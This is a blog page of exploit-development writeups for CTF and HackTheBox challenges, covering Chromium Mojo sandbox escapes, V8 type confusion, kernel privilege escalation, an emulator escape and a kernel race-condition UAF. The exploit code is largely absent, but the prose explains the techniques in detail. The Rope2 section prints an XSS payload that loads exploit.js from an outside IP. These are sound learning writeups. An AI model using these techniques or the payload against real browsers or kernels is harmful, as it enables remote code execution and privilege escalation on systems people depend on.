Search This Blog

Monday, July 12, 2021

RedpwnCTF 2021 Chromium SBX Tasks Writeup (Empires and Deserts)

This weekend, I participated in RedpwnCTF with my team Starrust Crusaders under the alias "The Static Lifetime Society", coming in second place overall. Since this was my first time doing a Chromium SBX challenge, I thought it would be a good idea to make a writeup. I'm still relatively unfamiliar with Mojo concepts and sbx escape, so feel free to point out any mistakes I make.

Here are some relevant resources I used to help me understand Chromium's architecture and sandbox escape techniques. I would recommend giving them a read before continuing.

Intro to Mojo

NotDeGhost's Intro Post about SBX

Chromium Architectural Overview

Git Repo of Previous Real World SBX Escapes

PlaidCTF Mojo Writeup

Google Quals 2019 Monochromatic Writeup


Empires:

We were given a Chromium binary, mojojs bindings, and a source patch. The only difference between the two parts is that part one is run with the CTF_CHALLENGE_EASY_MODE environment variable set. Chromium is also run with MojoJS bindings enabled. Usually in fullchain exploits, one would have to compromise the renderer first, overwrite the blink::RuntimeEnabledFeatures::is_mojo_js_enabled_  variable, refresh the page, and then attempt to escape the sandbox. Since we already have bindings enabled, we won't have to worry about any of that. Here's the provided patch:

The Wreck struct holds a size, a length_to_use, an optional BigBuffer, and a DesertType enum with variants DESOLATE and EMPTY. Sand is an array of wrecks. The most important struct is Ozymandias, which has the methods Visage and Despair,  a pointer reserved for a mmap page and an UnguessableToken. UnguessableTokens are cryptographically secure 128 bit random values. Note the author commented that the struct is 0x100 bytes, which can be verified as well when it hits in the new operator in that function (find the mangled name, and attach to the main privileged browser process to break).

The CreateKingofKings functions allows us to have the renderer request an interface from the browser process for the Ozymandias objects. Despair loops over the wrecks in a sand argument, allocating a new uint8_t array with a size determined by the wreck's size field. It memsets it as 0 in both options (although the first option doesn't seem so from source, I believe the compiler optimized the argument to 0 as you can see in disassembly). For the DESOLATE option, if your BigBuffer has data and a size greater than or equal to the wreck's size field, it transfers the contents to the uint8_t array up to the array's size. Then, it creates a base::span (which is like std::span) based on the allocated uint8_t array's start and your current wreck's length_to_use field. Visage is a backdoor; it requires a uint8_t vector and an UnguessableToken. If your token matches the current Ozymandias's UnguessableToken, the vector will be copied to a mmap rwx page and run as shellcode. One last thing to note is that when disassembling the constructor, you can see the UnguessableToken is a static variable. While randomized in different browser instances, it will remain the same within the same browser usage session.

Since the CTF_CHALLENGE_EASY_MODE env variable is set, we have a trivial heap OOB read because the length_to_use can now be bigger than size and the BigBuffer constructed from the span later will use length_to_use to bound the span. Moreover, the part that is unbounded by the size but bounded by the length_to_use will remain uninitialized. As the author mentioned, this concept is based on this real life sbx escape bug

Based on these facts, the exploit plan is pretty simple. I don't know much about PartitionAlloc behavior, but it's pretty easy to see from a few leaks of uninitialized memory that chunks of similar sizes get returned in the same regions. This means that we can just spray some Ozymandias objects, and then also spray some chunks that allow for OOB uninitiailized read, and leak the token so we can abuse the backdoor. 

Now, it should be pretty easy to just send in a reverse shell shellcode and escape the sandbox. However, one issue does remain, in that the mojojs bindings for UnguessableToken requires JS numbers, which won't preserve the accuracy for many possible token values. However, this is a simple patch. I performed the following change in the bindings to encode them as doubles:


Then, this was my final exploit (I just used a x86_64 linux rev shell shellcode from shellstorm):


As for the html website to send to the browser bot, I used the following (which was based off of NotDeGhost's post):


Here was the result from running the exploit on remote from my teammate's VPS (thanks Strellic!):


Deserts:

Now, the env variable is disabled. So what could possibly allow us to leak UnguessableTokens then? I have to admit that this step took an embarrassingly long time.

I first spent several hours reading up on this post about common Chromium IPC vulns and tried to compare them to the diff. Nothing was found this way.

Another idea teammates hypothesized was that maybe there is a TOCTOU race condition between when it checks for size and length_to_use and when length_to_use is used. However, data is serialized when passed to privileged browser process, so us trying to race in renderer is useless and will not apply changes there (and the window is too small since we need to abuse sizes of approximately 0x100).

Lastly, what really caught my attention is that if you have it not hit any of the cases in the switch statement, you will still get an uninitialized read. To do that, you need a new enum value, and unfortunately, Mojo validates all enums (unless the keyword extensible is used) along with several other validation checks. I thought this was an interesting scenario as we can change how we send things from the mojojs bindings and wanted to see if validation can be bypassed somehow. As I was messing around with wreck types, I noticed that I suddenly achieved a leak when I set my BigBuffer tag to 2, which stands for invalid storage. Debugging the codeflow, I noticed that the contents of the DesertType enum became 0 there somehow (if you set it to zero normally from renderer before serializing and sending, a validation error will occur and your renderer process will be killed). I wasn't too sure why, but according to NotDeGhost after my solve, it is because this enum causes deserialization to fail, so the rest of the struct will not be populated (hence leaving DesertType to 0). The NOTREACHED() statement in the diff is not compiled into release builds, allowing for us to trigger this bug and get uninitialized read when it works with wreck structs.

This time, however, we can't just spray some allocations and have an OOB leak data outside the chunk. We will need to free some OzymandiasImpl objects, which can be done pretty easily with .ptr.reset() as it is an interface implementation. Here is the final exploit:

Here is the result from remote:

Overall, I thought these were amazing challenges and finally pushed me to mess around a bit with Chromium sandbox escapes. Though introductory challenges into this complex topic, many of the concepts and basic techniques can probably be re-applied on more difficult sandbox escape challenges.

Here is the author's writeup! Make sure to check it out.


Monday, April 12, 2021

MidnightsunQuals 2021 BroHammer Writeup (Single Bit Flip to Kernel Privilege Escalation)

Last weekend, I played Midnightsun Quals and had a lot of fun with the kernel challenge brohammer. Since I learned a ton of new things from it, I thought it would be nice to make a writeup for it. Before I start, I would like to thank my fellow teammate c3bacd17 for working on this challenge with me and offering me some amazing insight in the way to approach this. As I proceed with the writeup, feel free to let me know if I made any mistakes in my explanations!

Starting off, we notice that KASLR, SMEP, and SMAP is off; this should make exploitation much easier. Additionally, we were given the source:

The kernel had a syscall added that gave us an arbitrary one bit flip on any specified address. Usually in a CTF, one of the first things to do with bit flipping challenges is to enable unlimited bits (usually due to signed comparisons), but here, an unsigned long is used, so achieving unlimited bit flips is impossible (if it was, this challenge would have been trivial). Now looking into this challenge name “brohammer,” it sounds suspiciously similar to rowhammer, an attack against DRAM to induce bit flips, which could lead to privilege escalation if page table entries were corrupted to point to physical memory containing a page table of the exploit process. We can use a similar idea to target the page directory/table related information.

In this challenge's kernel, there is 4 level paging. According to the Intel Manual Volume 3 section 4.5, this means that each virtual address maps to physical address based in the following way: the CR3 register stores the physical address of the PML4, and bits 47:39 from the vaddr specify the offset in the table for the respective page directory pointer table's physical location. If the 7th bit (PS flag) is set in this obtained value, then the entry just refers to a 1 gb page and the rest of the vaddr bits are used as linear offsets. Otherwise, it provides the pointer to the physical location of a page directory table and the vaddr's bits from 29:21 specify the offset in the table. If the PS bit is set in this obtained value, then it maps to a 2 mb page; otherwise, it goes to a page table, and the next 9 bits from vaddr is used to compute the offset for the entry to a 4 kb page, from which the final physical location is obtained.

Each entry also holds multiple control bits (refer to Table 4-14 to 4-20), but for this challenge, what really mattered are the following bits: bit 1 (R/W), bit 2, (Usermode/Supervisor), and bit 63 for NX.

To ease c3bacd17 and my attempts to look through such data, we briefly wrote a parser to dig around physical memory for the aforementioned tables with the help of qemu memory mode ("pmemsave 0 0x8000000 memdump" to cover the amount of given memory and “info tlb” were really helpful for this challenge, thanks to this writeup of the prequel to this challenge). The first idea I had was to attempt to gain usermode access to kernel memory; the brohammer function sounded like a nice target. Looking at the vaddr to paddr conversion in our parser, we note the following (note this section mapped as a 2 mb page):


Looking at the bits of the value 0000000000000000000000000000000000000001000000000000000111100001, we thought that we could just set bit 2 to enable usermode access to win! However, that leaves the question of writeability, and additionally, we didn't even gain usermode acccess there afterwards. Looking at Section 4.6 of the same volume, we discovered the following:

“Access rights are also controlled by the mode of a linear address as specified by the paging-structure entries controlling the translation of the linear address. If the U/S flag (bit 2) is 0 in at least one of the paging-structure entries, the address is a supervisor-mode address. Otherwise, the address is a user-mode address.”

Well, the page directory table value already violates that rule, so our target will still be considered to be within supervisor access only. The same applies to R/W.

Now, we just kept digging around through the physical memory dump, until c3bacd17 noticed that we could target physmap as well. Without KASLR, it always has the virtual address starting at 0xffff880000000000, and it is a large and continuous region that behaves as a direct mapping to physical memory (the starting location would thus map to 0 in physical memory).


Notice how the entire chain so far has the usermode and writeable bit set, and the address at 0x18fb060: 0x18001e3, where the PS bit is set (2 mb page), as well as the writeable bit. If we toggle the usermode bit, then we can actually modify a large portion of memory (2 mb) starting from 0x1800000 from userspace. This is really useful as this region holds the physical address 0x18fb040, which contains the page directory entry for where the kernel loads in memory (another 2 mb page) as 0x1000000 is the default physical load address for Linux Kernel; the address of startup_64 from kallsyms and 0xffff880001000000 (direct offset from physmap to default kernel physical load) map to the same physical location. 

At this point, our exploitation strategy is ready to go. We flip the usermode bit to on for the page directory entry at 0x18fb060 to enable usermode access to this region of page directory related information. Now, with usermode access there, we can flip the writeable and usermode bit for the entry at 0x18fb040, and by referencing the offset of the brohammer function from the vaddr of kernel base based on physmap, we can now rewrite the code there due to the changed permissions. I just injected a simple commit_creds(init_cred) shellcode. Here is the final exploit:


Interestingly enough, as a few other players pointed out, the TLB caches permissions as well for the virtual to physical mappings, so this would have been problematic for the exploit in real life (as QEMU's behavior isn't exactly correct I believe). However, section 4.10.4.3 mentions how it would actually work fine after the first attempt at access (which triggers a spurious page-fault).

Thanks once again for the interesting challenge, as well as my teammate c3bacd17 for working with me and proofreading this writeup!


Tuesday, April 6, 2021

Turboflan PicoCTF 2021 Writeup (v8 + introductory turbofan pwnable)

This year, picoCTF 2021 introduced a series of browser pwns. The first of the series was a simple shellcoding challenge, the second one was another baby v8 challenge with unlimited OOB indexing (about the same difficulty as the v8 pwnable from my Rope2 writeup - I recommend you to read this if you are unfamiliar with v8 exploitation), but what really caught my attention was the last browser pwnable, turboflan, which involved a bug in the turbofan JIT optimizer in Chromium. For those unfamiliar with turbofan, the following post from Jeremy Fetiveau is a nice read. I myself am still quite new to turbofan vulnerabilities, so please let me know if I made a mistake in my explanations.

Looking at the patch file, we see the following changes:


The most important change is the first part in effect-control-linearizer.cc LowerCheckMaps(). When running through code, v8 first generates ignition bytecode, and if it runs for many more times, Turbofan JIT compiles the code based on the types it sees used previously. When the optimized function encounters a new type, it should usually deoptimize to avoid the dangers of type confusion.

In the patch above, the challenge author specifically removed that deoptimization condition for when the map is different. This can easily lead to a bug by confusing 64 bit float arrays and object arrays (which consist of 32 bit pointers due to pointer compression).

Let's now try to trigger the bug in the provided d8 (with --allow-natives-syntax --trace-turbo --trace-opt --trace-deopt).

The first POC can be as simple as this:


Running in a d8 shell results in the following:

The type confusion did not exist here; in fact, there doesn't even seem to be an optimization option here. Doing a bit more digging with %DisassembleFunction in an up to date debug d8, bug() simply got inlined. Turbofan most likely caught this type change early on (in fact, around or before the ByteCode Graph Builder phase according to Turbolyzer), hence causing it to just deoptimize as soon as the loop was finished.

Knowing this, my next goal was to prevent inlining, and intuitively, it makes sense to just make the bugged function more complex to prevent such compiler behavior. I just tossed in a random for loop and it went away.


This time, we can see a type confusion in action:

In fact, just out of curiosity, let us compare the Turbolyzer outputs (this graph analysis tool was really not necessary for this challenge, but becomes very important in any harder Turbofan bug) between this bugged d8 and a normal d8.

In a normal d8, in TFEffectLinearization, the graph looks like the following:


In the bugged d8, the following is seen:


Notice how there is one less deoptimize condition node. One of the DeoptimizeUnless nodes in normal d8 is precisely where a check for a wrong map occurs. 



Now, let's begin to build some primitives that will eventually lead us to the addrof and fakeobj primitives. I created the following functions to help trigger the JIT bug:


Note that we are simply abusing type confusing between 64 bit float arrays and 32 bit object arrays (as pointers are now 32 bit due to pointer compression) here; we are not going out of bounds of the array length, as it will trigger a deoptimization due to other checks. Now, if we try to access idx 1 from an object array of 2 elements, it will actually hit arr[2] in the actual object array because the JIT code has been optimized for 64 bit arrays (similar to the Rope2 bug mentioned in a previous writeup).

Knowing the above behavior of the bug, we can easily leak the map of an object array (as well as the property pointer of fixed arrays as a confused 64 bit read/write will encounter both when going out of bounds). In at least all pointer compression based versions of v8, the float array map is at a constant offset from the object array map (0x50 specifically), so we will also now have a float array map address.


At this point, addrof and fakeobj are trivial to achieve. To grab the address of any objects, we fill an object array of size 2 with the target object. Then, using the confused_write method, we can OOB write and replace the object array map pointer with a float array map pointer (while also preserving the fixed array property, though this step isn't necessary most of the times). Now, returning indices from our array would leak the object addresses (one should restore the original array state afterwards for stability's sake).

fakeobj is even simpler. We can just use confused_write without OOB to directly change the addresses in the object array due to the type confusion, and return the new objects.


Now, arb read and arb write can be achieved. Unlike my previous Rope2 writeup, I have since discovered that map pointers can constantly be reused, making these primitives much easier to build. For both primitives, you create a float array with the first element holding a map pointer. Then you create a fake object over the part of memory holding those values, edit the array (with the original array object) to modify where the length and the element pointer would be, and now indexing into the fake object will give you arb read and arb write.

The rest of the exploit will become a generic Chrome exploit procedure without sandbox: initialize a wasm instance to create a rwx page, get the address of the wasm instance object, arb read its 64 bit pointer to the rwx page, and write shellcode outside the v8 heap (into the wasm page) by changing the 64 bit backing store pointer of an ArrayBuffer (use DataView to write to it). Then, calling the wasm function should trigger the shellcode. Sadly, the remote wasn't set up with an actual Chrome (it only used a d8), had strict firewall rules (so no reverse shells or bind shells), and would only let us see the stdout and stderr after running d8 (so no shell popping either); I just had to do a open read write shellcode :(

Here is my final exploit:


Overall, this was a very nice browser challenge to interest people into turbofan related bugs; thanks to the author wparks for making this pwnable and helping me clear up a few v8 related questions post-solve and my teammate pottm for the thorough proofread! These tasks were a refreshing change from the usual heap notes PicoCTF is famous for (though there were more format string tasks, which honestly are a crime against the category of pwn at this point and should just be removed from CTFs).  For those interested in more advanced and realistic Turbofan challenges, I highly recommend the challenge Modern Typer made by Faith on HackTheBox.

Sunday, March 7, 2021

zer0pts CTF 2021 Nasm-Kit Writeup (unicorn engine emulator escape)

This weekend, I played in Zer0pts CTF with my team Crusaders of Rust (aka Richard Stallman and Rust during the competition). Perhaps the most interesting task my friend c3bacd17 and I solved was nasm-kit, which required us to escape an x86_64 emulator written with the unicorn engine.

To start off, we were given source:

Looking over the code, it basically emulates the x86 instructions you send in. You only have 0x1000 bytes at most, and there is a code and a stack region setup by unicorn. There are a few handlers for segfaults and interrupts (which both terminate the program), a special syscall handler, and registers are initialized to null in the beginning. It also prints out your register state when the emulated process crashes (great for debugging!), and only allows mmap, munmap, write, exit, read, and exit_group in the syscall handler. Notice that the return values for all these syscalls are made non-standard by the handler. There's not really any vulnerable code here (I briefly considered that the mismatching new and delete operators in C++ could create issues, but I don't think it could lead to much here).

Below is the server side handler for the process.

Note that we have to send in code for NASM only, and it attaches the lines necessary for 64 bit assembly. Your NASM code length must be under 0x1000, and incbin as well as macros are disabled. The filename for this is also randomized.

So, where exactly is the bug? Well, back from *CTF 2021, there was a riscv64 QEMU userland "escape" challenge (Favorite Architecture 2) I did, and I remember that the emulated process could access the emulator memory mappings; of course, unicorn engine was more strict, but a similar idea does work. Since we do have mmap, this is probably what we can abuse. 

Looking through the mmap manpages, a few flags caught my attention. MAP_FIXED allows me replace pre-existing memory pages, and MAP_FIXED_NOREPLACE is the same thing as MAP_FIXED, but won't replace your memory and just return an error if a collision happens (the fixed part means that you want mmap to take your requested address literally rather than as a hint).

Using these two concepts, we can easily find the emulator mapping processes even under ASLR. For example, to get ELF base with PIE, we can perform a search from 0x550000000000 with MAP_FIXED_NOREPLACE, using smaller length requests as you go from leftwards digits to rightwards digits and checking for collisions. One can also write a binary search, but I was working on this challenge at 2 AM and was simply too tired to bother doing so.

Then, once you have some mapping addresses from the emulator, you can now abuse MAP_FIXED to forcibly replace emulator pages. However, since we do not have open or openat to make a new fd, we have to use MAP_ANONYMOUS, which will null out the pages. c3bacd17 and I originally considered writing the shellcode for shell elsewhere in the nasm file, and then use our file fd with offset option to control the new memory there immediately, but the file was closed as soon as the code was read. Another potential way is to find some section of code that isn't usually used during emulation, mmap over that region, write the arb shellcode there, and then hope to have it trigger later on without breaking the process. This is what we did, but it took some bruteforcing and fiddling.

In my exploit, rather than searching for ELF base (as I could not find a good page to perform the aforementioned attack in the binary itself), I searched for libc. I began my search for 0x7f0000000000, and hunted for the third page mapped in that region, as that became a constant offset to libc base due to the behavior of mmap during program initialization. The offset does vary across systems so some bruteforce is necessary when going from local to remote. The first two pages in that range were not a constant offset from libc base; I believe those are used by the unicorn-engine but am not completely sure. 

In libc itself, I chose one of the earlier 0x1000 pages of the .text segment, mmap'd over it, and filled the entire region with nops before ending it with an instruction to jmp to my shellcode (which I mmap'd at 0x13370000). This nop sled should really help with increasing reliability, and upon ending the emulated process in my shellcode, a shell did pop!

Here is my exploit:

Of course for remote, you will need to encode this for NASM format. c3bacd17 wrote the following script to just encode the raw binary as dqwords to send to the server.

The script generated the following as our final payload:

And after a few tries since my mmap search was slightly slow, I ended up popping a shell!

Thanks to ptr-yudai for this wonderful challenge, and the rest of the zer0pts CTF team for this amazing CTF!

Sunday, February 7, 2021

DiceCTF 2021 HashBrown Writeup: From Kernel Module Hashmap Resize Race Condition to FG-KASLR Bypass

This was the first time DiceCTF has been hosted (by DiceGang), and overall, I think it was a quite a successful experience and the CTF had a high level of difficulty. I wrote a single challenge called HashBrown, which had 7 solves total. I thought I would make a brief and short writeup to summarize the intended path (which most solvers took).


The following is the challenge description.

The kernel version was version 5.11, with SMEP, KPTI, and SMAP on. SMEP and KPTI aren't really big deals, but SMAP can make the process a more painful.

Setting CONFIG_SLAB causes the kernel to not use the traditional default SLUB allocator (which preserves the freelist linked list metadata on the kernel heap); instead it uses the older SLAB allocator which doesn't keep metadata on the heap (but rather in a slab manager that stores freed indices with the kmem_bufctl_t field). SLAB_FREELIST_RANDOM applies to both the SLAB and SLUB allocator, and is usually set in the kernels used in common distros (such as Ubuntu). I've experienced that feature multiple times during kernel exploits, and instead of having a nice linear heap that provides allocations in a deterministic order, the freelist order is scrambled and randomized upon initialization of new pages. Opening the module in GHIDRA/Binja/IDA also clearly reveals that usercopy is hardened.

The most important addition to this kernel challenge is FG-KASLR (as I was inspired by HXP ctf's kernel rop challenge that had FG-KASLR), which is a non mainline kernel security feature that provides extra randomization on top of KASLR. Usually, even with ASLR, you can rebase an entire binary by rebasing the leaks off of the non ASLR'd offsets. FG-KASLR brings an extra layer of protection (while also adding a second to the boot time) by compiling many of the functions in its own section, and re-scrambling all the sections during boot. Offset leaks should no longer be deterministic, but FG-KASLR only applies to functions that satifies the following criteria: the function is written in C and is not in a few special specific sections. Pointers to kernel data or some of the earlier parts of kernel code (and I think even the kpti trampoline that is useful in exploitation) remains at a constant offset from kernel base.

Now, let's take a look into the provided source code (players seem to have more fun with pwn when there is less reversing, so I released it 2 hours into the CTF):

To summarize the codebase, it is basically a hashmap in a driver, that can hold a maximum of 0x400 entries with a maximum array size of 0x200. Threshold is generally held at 0.75 and the hash function is copied from the JDK codebase before version 8. The overall code is also quite safe, as double frees, null dereferences, etc. are all checked throughout, and the linked list operations are also safe when collisions occur for the hashmap buckets. Size and error checks are also performed, and kzalloc() is used to null out newly allocated regions (to prevent leaks and such). However, having two mutex locks - one for resize and one for all other hashmap operations is quite strange, so perhaps it is a good idea to take a closer look at the resize function.

When resize is triggered, a new hashmap that has an array that is twice as large as the old one is initialized, but the global hashmap struct does not have its bucket field replaced yet. In order to not corrupt the linked list in the previous hashmap or lose hash entries, the module has to allocate new hash entries and copy over the data (including the value pointer of the key value pair of hashmap entries), and then place them in the newly allocated hashmap bucket accordingly (debugging this structure can be somewhat painful, so perhaps writing a gdb python handler can help). If the new request from the user is also valid, resize proceeds to userland copy the data over. Then, all the old hash_entries are freed (but not the values, as that won't make sense) and the old bucket is freed, before the global hashmap has its bucket array replaced.

While the resize function does sound safe, let us go back to the point about the 2 mutexes. Notice how a race condition can be created here? If we can get the hashmap resize to trigger and have it copy over values while also deleting a value (that is already copied over) from the current buckets, we can create a UAF scenario! If one mutex was used instead, or the bucket was replaced immediately in resize, this would not be an issue. I was hoping this would make for a more interesting CTF challenge bug, rather than a standard obvious heap note UAF or overflow by X scenario.

Now that we know the bug, we can come up with an exploitation plan. The first thing we need to do is to create a stable race scenario; otherwise your success rate will be quite low and you will run out resize operations really quickly. This is quite easy, as an add request when the threshold limit is hit causes the userland copy for the new entry to be handled in the code of resize(). We can use the classic userfaultfd pagefault technique to hang kernel threads on userland copy. 

On a sidenote, that setting has been the default for a very long time, but has actually been disabled in the 5.11 release candidate codebase; I had to make a one line patch in the kernel to revert it to the traditional behavior, but did not make note of that in the description as it is trivially easy to check that setting during OS runtime, would spoil the challenge if I explicitly changed the setting in the init script, and building the kernel with fg-kaslr with other versions was a mess.

Since the value allocations are capped at 0xb0, there is a limited range of useful kernel structures we can trigger to obtain leaks. A potential go-to would be seq_operations, but it only holds 4 function pointers that are all affected by FG-KASLR. I used shm_file_data, which contains pointers to kernel data. To leak this, we allocate just enough to the first threshold limit, and then trigger a resize. Once the resize function finishes copying over all the old hash_entries (including the value pointers), we use uffd technique to hang it, delete a value in another thread and use shmat to trigger an allocation of shm_file_data. After resize, we can still read that pointer value and we will be able to rebase kernel base.

In order to obtain arb write, we can follow a similar plan as the method used for leak. However, as SMAP is enabled, our options for gaining arb exec is quite limited. One nice technique to bypass SMAP is to overwrite some of the writeable strings the kernel uses in conjunction with usermode helper functions; modprobe_path is probably the most famous one, but many other also exist. We should use the race condition to UAF over a kmalloc-32 chunk to eventually overwrite the value pointer of a hash_entry that is allocated later. It is important to note that all the hash_entires in the current global bucket is freed as well, so the UAF'd chunk will not be the first chunk returned; you can easily check when you have control over a hash_entry by repeatedly using get_value. I noticed that the returning order of the freelist was somewhat deterministic but recall that this order was also scrambled in a previous kernel challenge; please let me know if you can clarify this part for me but I believe it is because a new page is not needed (and hence, shuffling doesn't occur).

Here is my final exploit and the result of running the exploit:

Another interesting solution I saw came from LevitatingLion of RedRocket CTF team. The exploit used a nice arb read write primitive to start reading for kernel data at 0xffffffffc0000000 scanning for kernel data and the modprobe string (like a pseudo-egghunt) to bypass FG-KASLR.

Feel free to let me know if any of my explanations were wrong, or let me know if you have any questions. Congrats to Pernicious from RPISEC for taking first blood and D3v17 for doing last minute testing for me! Thanks once again to all those who participated in DiceCTF and fellow organizers (especially the infra people asphyxia and ginkoid), and make sure to check out the other writeups, such as kmh's extreme pyjail challenge TI1337 Plus CE, defund's crypto challs, and NotDeGhost's Chromium sandbox escape challenge Adult CSP.

Saturday, January 16, 2021

Rope2 HackTheBox Writeup (Chromium V8, FSOP + glibc heap, Linux Kernel heap pwnable)

Rope2 by R4J has been my favorite box on HackTheBox by far. It wasn't really related to pentesting, but was an immersive exploit dev experience, which is my favorite subject. To sum it up, this box was composed of a V8 Chromium pwnable and a difficult glibc heap (with FSOP) pwn for user, and then a heap pwn on a vulnerable kernel driver on Ubuntu 19.04. In the end, I also did end up taking second intended user and root blood, with both first intended bloods being claimed by Sampriti of course; macz also ended up taking third intended blood.

Before I start, I would like to acknowledge Hexabeast, who worked with me on the v8 pwnable. I would also like to thank Sampriti and my teammate cfaeb1d for briefly discussing the user pwnable with me.

Initial enumeration is quite obvious. An nmap scan shows port 22, 5000, and 8000 open. On port 5000, it is a gitlab instance, and exploring around (http://rope2.htb:5000/explore/projects/starred), you can see chromium source code, with a patch by the challenge author. Use the gitlab website to download the source code at its current commit: http://ropetwo.htb:5000/root/v8/commit/7410f6809dd33e317f11f39ceaebaba9a88ea970

On port 8000, there is a website that allows us to submit a contact form. Since the gitlab makes it clear that this is a V8 pwnable, XSS would be an obvious vector. Testing something like <script src=http://10.10.14.9/exploit.js></script> showed a response on my local SimpleHTTPServer. Clearly, our path is to use the browser pwnable to write javascript code to gain RCE, from which we can trigger over the XSS.

Finding the bug is extremely easy. Take a look at the changed files in commit history. We notice that several files are changed, but the one that actually matters is builtin-arrays.cc. The other files were modified to properly introduce and incorporate the new function added in builtin-arrays.cc. 

In ArrayGetLastElement, it is returning the value of the array at array[len], which is an OOB read. in ArraySetLastElement, it expects two arguments. The first argument will be the “this” argument and the second argument is the value, which the element at array[len] will be set to. This is an obvious OOB write. This seems quite similar to Faith's famous *CTF OOB writeup. One important thing to note here is that in December 2019, the V8 team introduced pointer compression to the V8 heap. Basically, it's a pretty smart memory saving decision; rather than storing 64 bit pointers on the heap, most of the pointers will be treated as 32 bit (with only the bottom half of the qword stored), while the upper 32 bits (also known as the isolate root) is stored in the r13 register.

As mentioned earlier, the other files were just modified to support the addition of this new function for builtin arrays in V8.


typer.cc and bootstrapper.cc tells us that we can access these functions from builtin arrays with GetLastElement and SetLastElement.

For some reason, only the compiled Chromium was provided. There was neither a d8 release nor a d8 debug binary. The repo was also missing certain Chromium build scripts as well; however, once everything is fixed correctly, the build instructions Faith provided regarding Chromium Depot tools, gclient, v8gen.py, and ninja should suffice for both release and debug. To avoid dependency hell, I ended up rolling out an 18.04 docker to deal with the compilation (check out a commit near the date of the gitlab commit before the vulnerable patch, and then add the patch back in; I know some of my other teammates also managed to build it by slowly fixing the missing dependencies).

Before I start, I highly recommend you to check out Faith's writeup or the famous Phrack paper, as those were the sources I relied heavily upon (my exploit is also very closely based upon Faith's). I'm still quite new to V8, so their explanations will probably be better, but the following is a summary of some important concepts I learned for personal notes.

In V8 heap, there are three main types: smi, pointers, and doubles. Doubles are 64 bits, pointers are compressed to 32 bits (and tagged), and smi are 32 bits as well (with their values doubled to differentiate them from pointers). There are also several important components to an object on the V8 heap (which you can see by running debug d8 with --allow-natives-syntax option).  One should also note that Chromium uses a different allocator known as PartitionAlloc for most things, instead of glibc's allocator (which d8 uses).

For every V8 object, there are several important pieces of data. Map is the most important; it is a pointer to data that contains type information. According to Phrack, data such as object size, element types, and prototype pointer is stored in the Map. The following is a list of element types (V8 currently has 21), but V8 mainly uses SMI_ELEMENTS, DOUBLE_ELEMENTS, and ELEMENTS (with each of them having the more efficient PACKED form and the more expensive HOLEY form). Another important piece of information is the elements (and properties) pointer, which point to a region that contains a pointer to another Map, a capacity size, and then the data/pointers indexed. Array objects also have an additional additional length field as well (lengths are represented as an smi). 

Here is some sample output as an example for some of the terminology above (you can see how the fields are ordered from the debugging view as well):


Interesting to see how the double array's elements are usually above the object, which starts with the map field here... perhaps we can use the OOB to create some type confusion, as you will see later.

There are a few more important V8 exploitation concepts before we begin. In browser pwning, there are two basic types of primitives: addrof and fakeobj. Retrieving the address of an object is known as addrof. As Faith discusses, this can easily be done if you just create a type confusion of an object array into a double array, so its elements, which are pointers, get outputted as such. The other main type of primitive is the fakeobj primitive, where as the name implies, fake objects in memory. As Faith discusses again, this can be achieved by just creating another type confusion of a double array into an object array, and writing pointers into the elements.

Using these two primitives, one can achieve arbitrary reads and writes. For arbitrary reads, we can make a double array where the first element contains a double array map, and then create a fake object over that field (making it think its a double array). We can now manipulate the index which acts as the element pointer to be a valid address, and have it read its content from there by indexing into our fake object. Using this same concept, we can achieve an arbitrary write.

At this point, with all 4 of these primitives, we have enough to gain arbitrary code exec. Normally, Chromium runs under a sandbox that makes “arbitrary” not exactly true, but we don't have to worry about it here as it is disabled. The standard way in V8 exploitation is to use WASM instances. When you initialize a WebAssembly Instance, a new rwx page is mmap'd into V8 memory. Since this instance is also an object, you can leak its address. At the Instance + 0x68, the rwx page address is stored in its 64 bit entirety, so you can use arbitrary read to read it out. Then you can write your own shellcode into the rwx region. Calling your exported Web Assembly function will now execute such shellcode. One might wonder why such an advanced software would be using rwx page. Apparently, V8 devs pinpoint the issue on asm.js, which requires lazy compilation into Web Assembly, and the constant permission flips impact performance a lot.

However, how can you  write into 64 bit addresses outside of the V8 heap when there is pointer compression and you can't control the isolate root? Basically, ArrayBuffer's backing store still store the 64 bits in entirety as it references a region outside the V8 heap (since the backing store is allocated by ArrayBuffer::Allocator) as you can see in the image below.


If you change the backing store, you can now write to that arbitrary 64 bit address location (like in your WASM instance) with a DataView object initalized over your ArrayBuffer, since ArrayBuffer are low level raw binary buffers and only DataView (user specified types for values) or TypedArrays (uniform value access) can be used to interface with its contents. You can also perhaps find a stable way to leak a libc address as they do exist in the V8 heap (and V8 heap behaves predictably), and then choose to overwrite a hook function to another function or a stack pivot; do note that this success rate would work better inside d8 (since it uses glibc's allocator) than Chromium (which primarily relies on PartitionAlloc, but I believe glibc's allocator is still occasionally utilized).

Anyways, after the crash course above, let's begin discussing this exploit. Due to pointer compression, the OOB won't exactly be as easy as the one from *CTF (OOB behavior for double arrays will still behave the same). Notice how in the patch, builtin arrays are forcefully typecasted as 64 bit FixedDoubleArrays. If you have an array of objects, this forced typecasting groups 2 object pointers together as one double value each time while also retaining the same original length (but it'll also be indexed as a double array). For example, if you have an object array of size 2, typecasting this into a FixedDoubleArray makes it a FixedDoubleArray of size 2, which is equivalent to an object array of size 4, so indexing won't behave the same. If your object array is of size n, the OOB will access size n+1 from the FixedDoubleArray, which will be treated as the 2n+1 object array index.

For example, if I declare a size 2 array of objects called temp, the following behavior occurs:

convertToHex(ftoi64(temp.GetLastElement())) outputs 0x40808cad9
Running temp.SetLastElement(itof(0x13371337n)) causes the following behavior:
While this won't allow for a direct map overwrite and type confusion, but we just have to take a longer route around it. For addrof, you can start off by creating an object array of size 1, and an object array of size 2 (that contains your target objects). You should also grab some other double array's map, and the second array's element pointer with OOB read. This way, when we perform an oob write on the first object array, it will hit the real index (in terms of 32 bit compressed object pointers) of 3 from its starting index, which would overwrite both its own properties and elements pointer. We can replace its elements pointer with the elements pointer of the second array, and just wipe out properties pointer since it won't matter for arrays that much. Now, when we try to OOB write on the first array, it will still see it as size of 1 double (effectively 2 object pointers due to typecasting), but use the elements of the second array. Since an effective size of 2 object elements is the correct size for this size 2 object array, we will hit the second array's map and properties. Properties once again doesn't matter, and you can just replace the map with the leaked double map from the OOB read. Now indexing into this second array will leak the target object's address.

The same concept is applied to fakeobj. However, this time we aren't changing the map of the second larger object array. Rather, we want to grab it's map's value. Once we have that, we can normally OOB the float array and change it's map to an object array's map, and retrieve fake objects. Here is my implementation:


